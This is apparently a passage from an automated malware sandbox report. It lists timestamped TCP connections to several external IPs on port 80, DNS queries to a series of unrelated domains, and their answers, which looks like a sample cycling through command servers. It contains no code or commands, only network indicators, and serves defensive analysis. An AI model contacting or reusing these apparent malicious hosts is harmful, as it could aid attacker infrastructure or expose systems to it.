                                                                                  Nov 25, 2024 18:12:38.044286966 CET4979880192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:38.046266079 CET4979880192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:38.167867899 CET804979885.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:39.554526091 CET4979880192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:39.679363012 CET804979885.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:39.682451010 CET4979880192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:40.573811054 CET4980580192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:40.694951057 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.695085049 CET4980580192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:40.697352886 CET4980580192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:40.818993092 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.819061995 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.819106102 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.819164991 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.819252968 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.819324970 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.819411993 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.819422007 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:40.819525957 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:42.210793018 CET4980580192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:42.332530975 CET804980585.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:42.332611084 CET4980580192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:43.230247021 CET4981180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:43.351164103 CET804981185.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:43.356072903 CET4981180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:43.356072903 CET4981180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:43.476535082 CET804981185.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:13:44.783057928 CET804981185.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:13:44.783121109 CET804981185.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:13:44.783297062 CET4981180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:13:44.786468983 CET4981180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:13:44.907136917 CET804981185.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:13:50.137568951 CET4993780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:50.258111954 CET804993791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:50.258200884 CET4993780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:50.260495901 CET4993780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:50.380912066 CET804993791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:51.656143904 CET804993791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:51.656207085 CET804993791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:51.656270981 CET4993780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:51.773469925 CET4993780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:52.791997910 CET4994480192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:52.912488937 CET804994491.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:52.914524078 CET4994480192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:52.920407057 CET4994480192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:53.042263985 CET804994491.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:54.241307974 CET804994491.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:54.241507053 CET804994491.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:54.241570950 CET4994480192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:54.429672956 CET4994480192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:55.448512077 CET4995080192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:55.569046021 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.570703983 CET4995080192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:55.572906017 CET4995080192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:55.693559885 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.693578005 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.693661928 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.693675995 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.693751097 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.693816900 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.693872929 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.693885088 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:55.693953037 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:56.863779068 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:56.874697924 CET804995091.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:56.874806881 CET4995080192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:57.086349010 CET4995080192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:58.105535984 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:58.225944996 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:58.226018906 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:58.228084087 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:58.349806070 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633307934 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633322954 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633342028 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633363962 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633377075 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633387089 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633398056 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633409977 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633445024 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.633469105 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633481979 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.633502960 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.633527040 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.753947020 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.754005909 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.754115105 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.758156061 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.804586887 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.834649086 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.834697008 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.834774017 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.838870049 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.838979006 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.839051962 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.847537041 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.847577095 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.847646952 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.855782986 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.855865002 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.855940104 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.858670950 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.980142117 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:14:14.034852028 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:14.155302048 CET804999266.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:14.155376911 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:14.157547951 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:14.279181957 CET804999266.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:15.476638079 CET804999266.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:15.476677895 CET804999266.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:15.476763010 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:15.664108992 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:16.684458971 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:16.805843115 CET804999866.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:16.808553934 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:16.812448025 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:16.932952881 CET804999866.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:18.107289076 CET804999866.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:18.107475996 CET804999866.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:18.107528925 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:18.320488930 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:19.339931965 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:19.460556984 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.460731983 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:19.462949038 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:19.583734035 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.583770990 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.583854914 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.583908081 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.583944082 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.584094048 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.584122896 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.584175110 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.584203959 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:20.787000895 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:20.787015915 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:20.787206888 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:20.976955891 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:22.016592026 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:22.137470007 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:22.137551069 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:22.140304089 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:22.263262033 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:23.456640005 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:23.456794977 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:23.456950903 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:23.462579012 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:23.590068102 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:34.292339087 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:34.417608976 CET8050019195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:34.417692900 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:34.420121908 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:34.546010971 CET8050019195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:35.873465061 CET8050019195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:35.873868942 CET8050019195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:35.873935938 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:35.929992914 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:36.948410034 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:37.068967104 CET8050020195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:37.069118977 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:37.070976019 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:37.191445112 CET8050020195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:38.425026894 CET8050020195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:38.425255060 CET8050020195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:38.425321102 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:38.586050034 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:39.604475021 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:39.725178957 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.725255966 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:39.727935076 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:39.848423958 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848443985 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848550081 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848603010 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848612070 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848722935 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848738909 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848747969 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848756075 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:41.151376963 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:41.151459932 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:41.152529955 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:41.244481087 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:42.272392988 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:42.392925978 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:42.392992020 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:42.396215916 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:42.516709089 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:43.704267979 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:43.704552889 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:43.704610109 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:43.707626104 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:43.828557014 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:15:06.092111111 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:06.284584045 CET8050023217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:06.284666061 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:06.287043095 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:06.486644983 CET8050023217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:07.583836079 CET8050023217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:07.584134102 CET8050023217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:07.586683989 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:07.789272070 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:08.807718039 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:08.929816008 CET8050024217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:08.929918051 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:08.931967020 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:09.052447081 CET8050024217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:10.214279890 CET8050024217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:10.214567900 CET8050024217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:10.214632988 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:10.445477009 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:11.466717005 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:11.588392019 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.590734959 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:11.594854116 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:11.715939045 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.715950012 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716093063 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716101885 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716156006 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716167927 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716270924 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716301918 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716355085 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:12.854144096 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:12.854506969 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:12.854671001 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:13.101754904 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:14.121077061 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:14.326677084 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:14.326807976 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:14.328917027 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:14.449512005 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:15.645354033 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:15.645380020 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:15.646955967 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:15.649652958 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:15.903495073 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:15.903547049 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:15.966473103 CET8050026217.196.55.202192.168.2.4

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 25, 2024 18:11:43.740101099 CET6469653192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:11:44.742054939 CET6469653192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:11:45.273855925 CET53646961.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:11:45.273925066 CET53646961.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:12:02.089754105 CET6518053192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:12:02.490097046 CET53651801.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:12:10.558499098 CET5590653192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:12:11.349772930 CET53559061.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:12:26.201277971 CET5239453192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:12:26.470197916 CET53523941.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:12:34.527267933 CET5055053192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:12:35.263115883 CET53505501.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:13:49.794879913 CET5791953192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:13:50.134900093 CET53579191.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:14:04.870044947 CET5477053192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:14:05.094636917 CET53547701.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:14:13.278300047 CET5196053192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:14:14.032269001 CET53519601.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:14:33.480474949 CET6379453192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:14:34.288746119 CET53637941.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:14:48.714626074 CET5917253192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:14:48.947113037 CET53591721.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:14:57.027045965 CET5466753192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:14:57.409828901 CET53546671.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:15:05.464744091 CET6056853192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:15:06.089353085 CET53605681.1.1.1192.168.2.4
                                                                                  Nov 25, 2024 18:15:21.012162924 CET5209153192.168.2.41.1.1.1
                                                                                  Nov 25, 2024 18:15:21.297362089 CET53520911.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 25, 2024 18:11:43.740101099 CET192.168.2.41.1.1.10x5667Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:11:44.742054939 CET192.168.2.41.1.1.10x5667Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:02.089754105 CET192.168.2.41.1.1.10x5531Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:10.558499098 CET192.168.2.41.1.1.10xa62Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:26.201277971 CET192.168.2.41.1.1.10x40afStandard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:34.527267933 CET192.168.2.41.1.1.10xa49fStandard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:13:49.794879913 CET192.168.2.41.1.1.10x50ccStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:04.870044947 CET192.168.2.41.1.1.10xec33Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:13.278300047 CET192.168.2.41.1.1.10xfdafStandard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:33.480474949 CET192.168.2.41.1.1.10xaac4Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:48.714626074 CET192.168.2.41.1.1.10xfb36Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:57.027045965 CET192.168.2.41.1.1.10x1282Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:15:05.464744091 CET192.168.2.41.1.1.10x6c65Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:15:21.012162924 CET192.168.2.41.1.1.10x8114Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 25, 2024 18:11:45.273855925 CET1.1.1.1192.168.2.40x5667No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:11:45.273925066 CET1.1.1.1192.168.2.40x5667No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:02.490097046 CET1.1.1.1192.168.2.40x5531Name error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:11.349772930 CET1.1.1.1192.168.2.40xa62No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:26.470197916 CET1.1.1.1192.168.2.40x40afName error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:35.263115883 CET1.1.1.1192.168.2.40xa49fNo error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:35.263115883 CET1.1.1.1192.168.2.40xa49fNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 25, 2024 18:12:35.263115883 CET1.1.1.1192.168.2.40xa49fNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:13:50.134900093 CET1.1.1.1192.168.2.40x50ccNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:05.094636917 CET1.1.1.1192.168.2.40xec33Name error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:14.032269001 CET1.1.1.1192.168.2.40xfdafNo error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:34.288746119 CET1.1.1.1192.168.2.40xaac4No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:34.288746119 CET1.1.1.1192.168.2.40xaac4No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:48.947113037 CET1.1.1.1192.168.2.40xfb36Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:14:57.409828901 CET1.1.1.1192.168.2.40x1282Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:15:06.089353085 CET1.1.1.1192.168.2.40x6c65No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 25, 2024 18:15:06.089353085 CET1.1.1.1192.168.2.40x6c65No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 18:15:21.297362089 CET1.1.1.1192.168.2.40x8114Name error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false

